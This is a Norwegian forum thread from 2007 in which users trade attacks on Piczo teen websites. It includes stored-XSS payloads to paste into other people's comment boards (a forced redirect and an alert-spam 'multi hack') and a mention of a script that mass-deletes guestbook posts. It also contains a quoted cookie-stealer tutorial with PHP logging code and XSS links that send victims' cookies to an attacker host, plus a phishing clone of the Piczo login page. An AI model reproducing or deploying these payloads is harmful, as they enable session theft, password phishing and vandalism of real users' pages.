Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  247 44830
Sitat av HerBackleS
Fant dette innepå her


Gidder ikke å oversette...
Vis hele sitatet...
takk nå fant jeg ut hva som var feil:

Kode

<SCRIPT LANGUAGE = "JavaScript">window.location="http://www.google.com";</SCRIPT>
slik skal den være, prøvde det nå og det virket helt fint
Sitat av super
takk nå fant jeg ut hva som var feil:

Kode

<SCRIPT LANGUAGE = "JavaScript">window.location="http://www.google.com";</SCRIPT>
slik skal den være, prøvde det nå og det virket helt fint
Vis hele sitatet...


ser ikke ut til at dette virker lenger? det skal skrives i gjesteboka, sant?
Sitat av karrage
ser ikke ut til at dette virker lenger? det skal skrives i gjesteboka, sant?
Vis hele sitatet...
nei, når du er på en side så er det noen som har en link som hetter "Profile Page" trykk der så ser du noe som hetter "Comment Board" trykk på [Add Message] og der skriver du koden.

ps. noen har "Comment Board" andre plasser på siden som eksempel på forsiden.
isars's Avatar
Trådstarter
Sitat av Olav
Hei!

Da er jeg ferdig med scriptet for å slette fra gjestebøker. Funker nokså likt som det som sletter fra shoutboxen bare at det er fra gjesteboken ...

Slet en stund med denne før jeg til slutt fant ut at piczo krever cookies for at du skal få slette meldingene. Det betyr at du må lage en .txt fil med navnet cookies.txt som du legger i samme mappe som scriptet. Kjører du scriptet på linux så må du også chmode filen til 0777.

Her er scriptet:

Kode

<?php
//Piczo deleter 1.0
//Skrevet av Olav
//olav@megaspill.net
//URLen må være uten www. f.eks. slik: http://pic3.piczo.com/site/
$url="";.....
Skal se om jeg får satt sammen en GUI versjon imorgen..
Vis hele sitatet...
[COLOR=Red]Knall bra![/COLOR]
Da er det bare å vente litt så får vi se om det kommer en GUI versjon ganske snart!
Ridder av 1. klasse
men når jeg går inn på "Comment Board" og så [Add Message] får jeg opp at jeg må logge inn, men eg har ikke noe PW på piczo, så kossen fikkser eg det? må eg lage meg en bruker?
Nå er jeg ferdig med GUI for gjestebok sletteren.

Du finner koden her:
http://pastebin.no/1297
Eller du kan laste ned zip filen.

Den fungere på samme måte som den som sletter shoutboks meldinger, alltså med curl etc. Men for å slette gjestebok meldinger så krever piczo at de kan få lagre cookies. Derfor må du opprette filen cookies.txt som du legger i samme mappe som scriptet. Bruker du linux elns så er det også viktig å chomode den til 0777...
Bare en melding til isars: Når du går på http://www.nff-hax.piczo.com --->Comment Board så kommer det fram noe drit ekkelt
Sitat av Mchjort
men når jeg går inn på "Comment Board" og så [Add Message] får jeg opp at jeg må logge inn, men eg har ikke noe PW på piczo, så kossen fikkser eg det? må eg lage meg en bruker?
Vis hele sitatet...
det er bare og lage en falsk bruker, den lager du under 1min.
Ridder av 1. klasse
men, når du har skrevet inn den koden i "commet board" og alt funker som det skal. Er det da noen mulighet til å forandre den igjen, til en ny side? f.eks fra sol.no til finn.no? hvordan gjør du i såfall det?
hvis du redirecte så trur jeg at eieren må slette den men hvis det er pop-up en så er det bare og slette innlegget.
Ridder av 1. klasse
det er jo mange som har "bilde-sider" tror dere det er mulig at vi kan legge ut nye bilder på bilde-sidene, uten og være logget inn som admin?
Har du cURL installert?
edit: Hvilken skrift kommer? Hvilke feil meldinger får du?
nso
popålol
nso's Avatar
Administrator
Denne tråden har nå blitt ryddet betraktelig.

Vær obs på at selv om denne tråden handler om et fjortissnettsted så er det ingen unnskyldning for å oppføre seg og skrive som man gjør der. Dialekt og innholdsløse innlegg er fremdeles regelbrudd på nFF.
Legger disse linkene ut på nytt siden den andre posten ikke kunne endres.
Olavs ShoutboxDeleter Script

Olavs GjestebokDeleter Script
Noe annet som jeg har oppdaget er at shoutbox sletteren funker ikke lengere, noe som også er veldig leit.
Sist endret av ynkey; 10. april 2007 kl. 16:27.
Sitat av ynkey
Noe annet som jeg har oppdaget er at shoutbox sletteren funker ikke lengere, noe som også er veldig leit.
Vis hele sitatet...
Dette er feil... Jeg prøvde nettop begge scriptene til Olav og de funket veldig bra, på nff-haxx sida. Hva var det du gjorde galt? Jeg fikk både slettet shoutbox innlegg og gjestebok innlegg.
Jeg prøvde på nytt med "shoutbox deleteren" og fikk opp denne meldingen:
Warning: file_get_contents() [function.file-get-contents]: Unable to access SCRIPT LANGUAGE = \"JavaScript\">window.location=\"http://www.google.com\";</SCRIPT> in /usr/home/web/wno125740/dorull.net/piczogui.php on line 91

Warning: file_get_contents(SCRIPT LANGUAGE = \"JavaScript\">window.location=\"http://www.google.com\";</SCRIPT>) [function.file-get-contents]: failed to open stream: No such file or directory in /usr/home/web/wno125740/dorull.net/piczogui.php on line 91

Warning: file_get_contents() [function.file-get-contents]: Unable to access SCRIPT LANGUpiczo.com/go/shoutbox? in /usr/home/web/wno125740/dorull.net/piczogui.php on line 95

Warning: file_get_contents(SCRIPT LANGUpiczo.com/go/shoutbox?) [function.file-get-contents]: failed to open stream: No such file or directory in /usr/home/web/wno125740/dorull.net/piczogui.php on line 95

window.location=\"http://www.google.com\";" target=_blank>SCRIPT LANGUAGE = \"JavaScript\">window.location=\"http://www.google.com\"; (endre)
Vis hele sitatet...
hva er feil?
Sist endret av ynkey; 10. april 2007 kl. 16:57.
isars's Avatar
Trådstarter
Husk at URLen må være uten www. f.eks slik: http://pic3.piczo.com/site/.
Det er viktig at URLen er slik, og ikke f.eks. http://www.site.piczo.com/?cr=6&rfm=y

:P
Sitat av isars
Husk at URLen må være uten www. f.eks slik: http://pic3.piczo.com/site/.
Det er viktig at URLen er slik, og ikke f.eks. http://www.site.piczo.com/?cr=6&rfm=y

:P
Vis hele sitatet...
det vet jeg men det er når jeg opner siden: http://www.dorull.net/piczogui.php jeg får meldingen ikke etter at jeg har skrevet inn adresse. det er nemlig ikke mulig å skrive inn adresse. :s
I see you...
NAPse's Avatar
Har lagt merke til at shoutbox sletteren ikke alltid fungerer som den skal hvis det er mange innlegg i den.
Kan dere gi noen eksempler på sider som ikke fungerer slik at jeg kan få se om jeg får fikset det? Evt. send de på PM til meg hvis dere ikke vil legge de ut her..
<?php echo 'VIF'; ?>
datagutten's Avatar
I forhold til passord, så skal jeg prøve å mekke noe phising greier som gir seg ut for å være piczo som spør etter brukernavn og passord, men istedet gir det til deg.
Hei, jeg skal prøve og sette sammen en heil haug av Hacks/Scripts/javascripts slik at alle funker likt så det blir kaos på siden. Jeg skal sette sammen en heil haug og jeg vil skrive den inn her i forumet når jeg er ferdig
Hvis dere er litt greie og poster alle Hacks/scripts/javascripts her så jeg kan sette den sammen.
Takk!


.:Ή λС Σ Я ™:.
Sist endret av heggs80; 10. april 2007 kl. 23:57.
her er en link som jeg postet en stund siden, men da ble innlegget fjernet

http://media.putfile.com/Hvordan-Sle...es-Piczo-sider

viser enkelt og greit hvordan du slette piczo shoutbox
alt er på norsk og du må bruke opera
isars's Avatar
Trådstarter
Sitat av heggs80
Hei, jeg skal prøve og sette sammen en heil haug av Hacks/Scripts/javascripts slik at alle funker likt så det blir kaos på siden. Jeg skal sette sammen en heil haug og jeg vil skrive den inn her i forumet når jeg er ferdig
Hvis dere er litt greie og poster alle Hacks/scripts/javascripts her så jeg kan sette den sammen.
Takk!


.:Ή λС Σ Я ™:.
Vis hele sitatet...
Nice Vi gleder oss til å se resultatet!
<?php echo 'VIF'; ?>
datagutten's Avatar
Ta en kikk på denne:
http://home.no.net/dtnorsk/piczo1.php
Det er en nøyaktig kopi av piczo forsiden, men sender deg til et helt annet sted når du logger på.
Jeg surfet litt og fant dette på nettet (en guide til og lage en cookiestealer)
Writing the stealer.
I will give you the script and after that I will explain what it does line by line. So here it is:

1 <?php
2 $cookie = $_GET['c];
3 $ip = getenv ('REMOTE_ADDR');
4 $date=date("j F, Y, g:i a");;
5 $referer=getenv ('HTTP_REFERER');
6 $fp = fopen('cookies.txt', 'a');
7 fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
8 fclose($fp);
9 header ("Location: /picture.html");
10 ?>

That's all! Well, time to explain:

1: <?php Opening tag for php... that's just all
2: $cookie = $_GET['C']; Here the variable $cookie gets the content out of the adress, from what's behind C=[the cookie]
3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person which is redirected to our stealer.
4. $date=date("j F, Y, g:i a");; This sets the variable $date the current time and date, IMPORTANT: this is done in dutch way, so year - month - day!
5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't you think =p
6. $fp = fopen('cookies.txt', 'a'); This specifies the file which has to be rewritten with the cookie, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.
7. fwrite($fp, 'Cookie: '.$cookie.'\n IP: ' .$ip. '\n Date and Time: ' .$date. '\n Referer: '.$referer.'\n\n\n'); This line writes the content to the file.
8. fclose($fp); Close the file (dûh)
9. header ("Location: /picture.html"); send the visitor to another page, so he wont notice that the cookie is logged... ofcourse picture.html can be everything.
10. ?> The closing tag for a php-script

Now we have to know how to make the link:
This must be the most basic version:

<script>window.location('http://www.mysite/cookie.php?c=' + document.cookie)</script>

But when doing it hardcore, you can do it this way:

<a
href=”http://www.example.com/index.php?page=<script>document.location.replace('http://www.mysite.com/log.php?c=' +document.cookie);</script>”
onmouseover=”window.status='http://www.example.com/login.php'; return true”
onmouseout=”window.status=''; return true”
>Login page</a>

Be creative!

IMPORTANT:
Last but not least, don't forget to create a cookies.txt on your server and chmod it 666...

Links:

http://www.php.net // all about PHP
http://www.ipswitch.com // WS_FTP
http://www.google.com // Use it goddamnit!
http://www.hackthissite.org // The only site this article may be published!


Greetings to the free world,
SjaakRake (NL)
Vis hele sitatet...
Hva mener de med chmod it 666?

Sitat av datagutten
Ta en kikk på denne:
http://home.no.net/dtnorsk/piczo1.php
Det er en nøyaktig kopi av piczo forsiden, men sender deg til et helt annet sted når du logger på.
Vis hele sitatet...
:eg testet siden din og dette kom da:
Brukernavn: ynkeykødd

Passord: 691bc76101bd63f72eee7e00b87d9905
Vis hele sitatet...
Hva er alle de tallene og tegnene for noe? cookien min?
Sist endret av ynkey; 11. april 2007 kl. 18:33.
Trigonoceps occipita
vidarlo's Avatar
Donor
Det er nok en sum av passord, type md5sum eller sha-sum.
Sitat av vidarlo
Det er nok en sum av passord, type md5sum eller sha-sum.
Vis hele sitatet...
Hva er md5sum eller sha-sum?
Trigonoceps occipita
vidarlo's Avatar
Donor
ynkey, veit du kva 3. viktigaste egenskapen for en wannabee hacker er? Googling.
<?php echo 'VIF'; ?>
datagutten's Avatar
Passordet er foreløpig kryptert, men skal prøve å få fjernet krypteringen. Dette oppsettet var bare ment som en proof of concept, for å vise at det går an å sende påloggingen til en helt annen side.
Vet at det ikke er MD5 kryptering, siden jeg prøvde å dekryptere med rainbowtables, og testet ved å skrive inn et passord jeg visste MD5 hashen til.
Sist endret av datagutten; 11. april 2007 kl. 19:11.
Trigonoceps occipita
vidarlo's Avatar
Donor
...dersom det er ei pishing-side så er det jo trivielt å endre back-end til å vise passord i klartekst evt. skrive det til fil...?
noen som veit hvordan man sletter comment board via script eller javascript?
Sitat av datagutten
Passordet er foreløpig kryptert, men skal prøve å få fjernet krypteringen. Dette oppsettet var bare ment som en proof of concept, for å vise at det går an å sende påloggingen til en helt annen side.
Vet at det ikke er MD5 kryptering, siden jeg prøvde å dekryptere med rainbowtables, og testet ved å skrive inn et passord jeg visste MD5 hashen til.
Vis hele sitatet...
Du er klar over at de fleste får en svær feit warning når du prøver å sende innloggings-form til en offsite side? Phishing filterene har tatt seg betraktelig opp den siste tiden og brorparten av folk kjører IE7, som har et ganske oppdatert anti-phishing-filter.
<?php echo 'VIF'; ?>
datagutten's Avatar
Ja, men formen i seg selv er på min fake side. Når det er ferdig skal ikke passordet vises, bare lagres i databasen, og brukeren sendes videre til den ekte forsiden.
Trigonoceps occipita
vidarlo's Avatar
Donor
Eg vil også påpeike at i det du beveger deg fra å utnytte sikkerhetshull i JS til å sette opp phishing-side, så beveger du deg fra et gråsone-område til soleklart lovbrudd, både på åndsverkslova og straffelova...
er klar over at dette er en liten off topic, men får ikke til det med cURL
har lestet ned fra http://curl.haxx.se/dlwiz/?type=deve...in32&flav=MSVC
så kjører jeg exe filen, så kommer det opp en svart boks som så ut som et cmd vindu før den forsvinner igjen
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av thorstein
er klar over at dette er en liten off topic, men får ikke til det med cURL
har lestet ned fra http://curl.haxx.se/dlwiz/?type=deve...in32&flav=MSVC
så kjører jeg exe filen, så kommer det opp en svart boks som så ut som et cmd vindu før den forsvinner igjen
Vis hele sitatet...
Prøv å lese dokumentasjonen til curl.

curl.exe er et program for kommunikasjon via protokollen HTTP.

Det finst *også* som modul til php, som da må kompilerast inn.
skjønte ikke helt hva du mente med "Det finst *også* som modul til php, som da må kompilerast inn."

Er det noe annet jeg skal laste ned.
Beklager skjønte ikke det der helt :S
Last ned XAMPP. Så går du i PHP.ini og setter på cURL. Noe lettere finnes ikke!

Kode

;extension=php_curl.dll
Let etter den i php.ini.

Fjern ; og voila, du har cURL.
Dersom jeg prøver å endre en gjestebokpost får jeg meldingen: "An error was encountered".
Alt annet funker derimot utmerket. Tusen takk. Noen tips?
Et lite spørsmål.. Skiller piczo mellom store og små bokstaver på innlogginghspassordet?
Tror egentlig ikke det, men det er jo bare å teste
isars's Avatar
Trådstarter
Et lite spørsmål.. Skiller piczo mellom store og små bokstaver på innlogginghspassordet?
Vis hele sitatet...
Tror egentlig ikke det, men det er jo bare å teste
Vis hele sitatet...
Dette er ikke relartert til postens emne!
Men vet noen hvordan man sletter text fra comment board?
Sitat av isars
Dette er ikke relartert til postens emne!
Vis hele sitatet...
kan være det hvis han er i vei med å utvikle/finne en "hack"
Min Multi Hack er nå ferdig! den er nokså irriterende tihi
Vell her er den prøv den ut på noens Comment board på Piczo og Gjesteboka blir fucka!

<Script>alert("hi there")</script>
<Script>alert("are you bored?")</script>
<Script>alert("yes ofc me too")</script>
<Script>alert("Have you heard of..")</script>
<Script>alert("na forget it")</script>
<Script>alert("You will problably think im crazy")</script>
<Script>alert("do you think so?")</script>
<Script>alert("Youre out of your mind dude")</script>
<Script>alert("Im not gonna leave...")</script>
<Script>alert("Do you want me to leave? huh?")</script>
<Script>alert("huh?")</script>
<Script>alert("Yea sure you want me to leave. but!")</script>
<Script>alert("I WANT LEAVE!!!")</script>
<Script>alert("hahahahaha ha!")</script>
<Script>alert("YOure stupid you know that ^^ ")</script>
<Script>alert("Can i help you with somethin?")</script>
<Script>alert("sure, il leave you..")</script>
<Script>alert("NOT!!!")</script>
<Script>alert("well well Bye then ^^")</script>
<script>alert("Thanks for enjoying, .:PiczoMuLtIH4cK:.")</script>
<script>javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);</script>
<script>javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);</script>
<script>alert("this is fun")</script>
<script>alert("Thanks for using .:PiczoMuLtIH4cK:. ")</script>








________________________
tihi
Sitat av heggs80
Min Multi Hack er nå ferdig! den er nokså irriterende tihi
Vell her er den prøv den ut på noens Comment board på Piczo og Gjesteboka blir fucka!

<Script>alert("hi there")</script>
<Script>alert("are you bored?")</script>
<Script>alert("yes ofc me too")</script>
<Script>alert("Have you heard of..")</script>
<Script>alert("na forget it")</script>
<Script>alert("You will problably think im crazy")</script>
<Script>alert("do you think so?")</script>
<Script>alert("Youre out of your mind dude")</script>
<Script>alert("Im not gonna leave...")</script>
<Script>alert("Do you want me to leave? huh?")</script>
<Script>alert("huh?")</script>
<Script>alert("Yea sure you want me to leave. but!")</script>
<Script>alert("I WANT LEAVE!!!")</script>
<Script>alert("hahahahaha ha!")</script>
<Script>alert("YOure stupid you know that ^^ ")</script>
<Script>alert("Can i help you with somethin?")</script>
<Script>alert("sure, il leave you..")</script>
<Script>alert("NOT!!!")</script>
<Script>alert("well well Bye then ^^")</script>
<script>alert("Thanks for enjoying, .:PiczoMuLtIH4cK:.")</script>
<script>javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);</script>
<script>javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);</script>
<script>alert("this is fun")</script>
<script>alert("Thanks for using .:PiczoMuLtIH4cK:. ")</script>


________________________
tihi
Vis hele sitatet...
haha den var genial
Pretty Princess
Freaken's Avatar
Sitat av isars
jeg tenkte at nå som vi har fått opp en god del hacks/Scripts, så er det nok en del av oss som kommer til å prøve dem ut. Og for at ikke andre skal bli irriterte over at vi skal teste ut på dems Piczo side så har jeg valgt å legge ut en liten Piczo side som dere kan teste dette ut på.

[COLOR=Red]www.NFF-HAX.piczo.com [/COLOR]
Vis hele sitatet...

tror nok kanskje nFF vil ha seg frabedt at du bruker logoen deres.
I see you...
NAPse's Avatar
1. Gå inn her http://www.tull.no/innhold/moro/humor/latter.php
2. Hold inne enter til alertboksene er ferdig.
3. Gå inn på vis kilde, kopier alle alert komandoene og legg dem inn på et comment board.